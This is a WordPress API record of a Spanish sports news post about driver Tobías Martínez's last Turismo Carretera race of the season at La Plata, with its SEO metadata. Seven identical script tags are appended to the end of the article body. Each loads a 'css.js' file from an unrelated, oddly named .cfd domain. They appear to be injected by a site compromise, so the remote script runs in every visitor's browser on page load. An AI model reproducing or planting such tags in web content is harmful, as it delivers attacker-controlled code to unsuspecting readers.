{"id":24273,"date":"2025-12-04T21:15:58","date_gmt":"2025-12-05T00:15:58","guid":{"rendered":"https:\/\/www.sanjuandeportes.com\/wp\/?p=24273"},"modified":"2026-02-02T18:44:43","modified_gmt":"2026-02-02T21:44:43","slug":"tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata","status":"publish","type":"post","link":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/12\/04\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\/","title":{"rendered":"Tob\u00edas Mart\u00ednez cierra el a\u00f1o de Turismo Carretera en La Plata"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\"><em>Corre con el Toyota Camry del equipo Rus Med en el aut\u00f3dromo Roberto Mouras.<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El piloto sanjuanino se presenta por la decimoquinta y \u00faltima fecha del Turismo Carretera en el aut\u00f3dromo Roberto Mouras de La Plata, con el Toyota Camry del equipo Rud Med #107. Mart\u00ednez buscar\u00e1 un buen resultado en una temporada adversa, donde la mejor posici\u00f3n fue un puesto 13, por el d\u00e9cimo compromiso del a\u00f1o en el aut\u00f3dromo Oscar y Juan G\u00e1lvez de Buenos Aires. En esa carrera fue la m\u00e1s puntos sum\u00f3 (24), seguido por la quinta en Termas de R\u00edo Hondo (20), y en la duod\u00e9cima en San Nicol\u00e1s acumul\u00f3 17. Fuera de esas competencias solo sum\u00f3, como mucho, 6 unidades por fecha, abandonando en varias carreras. Los inconvenientes mec\u00e1nicos no le permiten estar m\u00e1s adelante en el campeonato, donde ocupa el puesto 38 con 92,5 puntos.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">La actividad del TC comenzar\u00e1 el d\u00eda s\u00e1bado con el 1\u00b0 y 2\u00b0 entrenamiento, a las 11:05 y 13:20 respectivamente, antes de la clasificaci\u00f3n que iniciar\u00e1 a las 16:03, y que ordenar\u00e1 la grilla de partida de las series, a realizarse el domingo desde las 10:10, 10:35 y 11:00 (5 vueltas cada una). La final ser\u00e1 a partir de las 14:00, con 25 giros al trazado platense, competencia que coronar\u00e1 al campe\u00f3n, con Agust\u00edn Canapino como m\u00e1ximo candidato.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Este fin de semana, con la trig\u00e9sima carrera de Tob\u00edas en la categor\u00eda, tambi\u00e9n se puede confirmar la continuidad o no del sanjuanino en el equipo, o definir si sigue en el TC pero dentro de otra estructura.<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>Corre con el Toyota Camry del equipo Rus Med en el aut\u00f3dromo Roberto Mouras. El piloto sanjuanino se presenta por la decimoquinta y \u00faltima fecha del Turismo Carretera en el aut\u00f3dromo Roberto Mouras de La Plata, con el Toyota Camry del equipo Rud Med #107. Mart\u00ednez buscar\u00e1 un buen resultado en una temporada adversa, donde [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":24274,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[39,48,2,178],"tags":[],"class_list":["post-24273","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-automovilismo","category-destacada","category-featured","category-san-juan"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Tob\u00edas Mart\u00ednez cierra el a\u00f1o de Turismo Carretera en La Plata - San Juan Deportes<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sanjuandeportes.com\/wp\/2025\/12\/04\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Tob\u00edas Mart\u00ednez cierra el a\u00f1o de Turismo Carretera en La Plata - San Juan Deportes\" \/>\n<meta property=\"og:description\" content=\"Corre con el Toyota Camry del equipo Rus Med en el aut\u00f3dromo Roberto Mouras. El piloto sanjuanino se presenta por la decimoquinta y \u00faltima fecha del Turismo Carretera en el aut\u00f3dromo Roberto Mouras de La Plata, con el Toyota Camry del equipo Rud Med #107. Mart\u00ednez buscar\u00e1 un buen resultado en una temporada adversa, donde [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/2025\/12\/04\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\/\" \/>\n<meta property=\"og:site_name\" content=\"San Juan Deportes\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/sanjuandeportesok\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-05T00:15:58+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-02T21:44:43+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/12\/Sin-titulo.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"819\" \/>\n\t<meta property=\"og:image:height\" content=\"376\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:site\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/12\\\/04\\\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/12\\\/04\\\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\"},\"headline\":\"Tob\u00edas Mart\u00ednez cierra el a\u00f1o de Turismo Carretera en La Plata\",\"datePublished\":\"2025-12-05T00:15:58+00:00\",\"dateModified\":\"2026-02-02T21:44:43+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/12\\\/04\\\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\\\/\"},\"wordCount\":277,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/12\\\/04\\\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/12\\\/Sin-titulo.jpg\",\"articleSection\":[\"Automovilismo\",\"destacada\",\"Featured\",\"San Juan\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/12\\\/04\\\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/12\\\/04\\\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/12\\\/04\\\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\\\/\",\"name\":\"Tob\u00edas Mart\u00ednez cierra el a\u00f1o de Turismo Carretera en La Plata - San Juan Deportes\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/12\\\/04\\\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/12\\\/04\\\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/12\\\/Sin-titulo.jpg\",\"datePublished\":\"2025-12-05T00:15:58+00:00\",\"dateModified\":\"2026-02-02T21:44:43+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/12\\\/04\\\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/12\\\/04\\\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/12\\\/04\\\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/12\\\/Sin-titulo.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/12\\\/Sin-titulo.jpg\",\"width\":819,\"height\":376},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/12\\\/04\\\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Tob\u00edas Mart\u00ednez cierra el a\u00f1o de Turismo Carretera en La Plata\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"name\":\"San Juan Deportes\",\"description\":\"El sitio de deportes de la provincia de San Juan\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\",\"name\":\"San Juan Deportes\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"width\":900,\"height\":900,\"caption\":\"San Juan Deportes\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/sanjuandeportesok\",\"https:\\\/\\\/x.com\\\/SanJuanDeportes\",\"https:\\\/\\\/www.instagram.com\\\/sanjuandeportes\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Tob\u00edas Mart\u00ednez cierra el a\u00f1o de Turismo Carretera en La Plata - San Juan Deportes","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/12\/04\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\/","og_locale":"es_ES","og_type":"article","og_title":"Tob\u00edas Mart\u00ednez cierra el a\u00f1o de Turismo Carretera en La Plata - San Juan Deportes","og_description":"Corre con el Toyota Camry del equipo Rus Med en el aut\u00f3dromo Roberto Mouras. El piloto sanjuanino se presenta por la decimoquinta y \u00faltima fecha del Turismo Carretera en el aut\u00f3dromo Roberto Mouras de La Plata, con el Toyota Camry del equipo Rud Med #107. Mart\u00ednez buscar\u00e1 un buen resultado en una temporada adversa, donde [&hellip;]","og_url":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/12\/04\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\/","og_site_name":"San Juan Deportes","article_publisher":"https:\/\/www.facebook.com\/sanjuandeportesok","article_published_time":"2025-12-05T00:15:58+00:00","article_modified_time":"2026-02-02T21:44:43+00:00","og_image":[{"width":819,"height":376,"url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/12\/Sin-titulo.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_creator":"@SanJuanDeportes","twitter_site":"@SanJuanDeportes","twitter_misc":{"Escrito por":"admin","Tiempo de lectura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/12\/04\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\/#article","isPartOf":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/12\/04\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\/"},"author":{"name":"admin","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3"},"headline":"Tob\u00edas Mart\u00ednez cierra el a\u00f1o de Turismo Carretera en La Plata","datePublished":"2025-12-05T00:15:58+00:00","dateModified":"2026-02-02T21:44:43+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/12\/04\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\/"},"wordCount":277,"commentCount":0,"publisher":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/12\/04\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/12\/Sin-titulo.jpg","articleSection":["Automovilismo","destacada","Featured","San Juan"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.sanjuandeportes.com\/wp\/2025\/12\/04\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/12\/04\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/12\/04\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\/","name":"Tob\u00edas Mart\u00ednez cierra el a\u00f1o de Turismo Carretera en La Plata - San Juan Deportes","isPartOf":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/12\/04\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\/#primaryimage"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/12\/04\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/12\/Sin-titulo.jpg","datePublished":"2025-12-05T00:15:58+00:00","dateModified":"2026-02-02T21:44:43+00:00","breadcrumb":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/12\/04\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sanjuandeportes.com\/wp\/2025\/12\/04\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/12\/04\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\/#primaryimage","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/12\/Sin-titulo.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/12\/Sin-titulo.jpg","width":819,"height":376},{"@type":"BreadcrumbList","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/12\/04\/tobias-martinez-cierra-el-ano-de-turismo-carretera-en-la-plata\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"http:\/\/www.sanjuandeportes.com\/wp\/"},{"@type":"ListItem","position":2,"name":"Tob\u00edas Mart\u00ednez cierra el a\u00f1o de Turismo Carretera en La Plata"}]},{"@type":"WebSite","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#website","url":"https:\/\/www.sanjuandeportes.com\/wp\/","name":"San Juan Deportes","description":"El sitio de deportes de la provincia de San Juan","publisher":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sanjuandeportes.com\/wp\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization","name":"San Juan Deportes","url":"https:\/\/www.sanjuandeportes.com\/wp\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","width":900,"height":900,"caption":"San Juan Deportes"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/sanjuandeportesok","https:\/\/x.com\/SanJuanDeportes","https:\/\/www.instagram.com\/sanjuandeportes"]},{"@type":"Person","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3","name":"admin","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/www.sanjuandeportes.com\/wp\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/24273","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/comments?post=24273"}],"version-history":[{"count":8,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/24273\/revisions"}],"predecessor-version":[{"id":28427,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/24273\/revisions\/28427"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media\/24274"}],"wp:attachment":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media?parent=24273"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/categories?post=24273"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/tags?post=24273"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}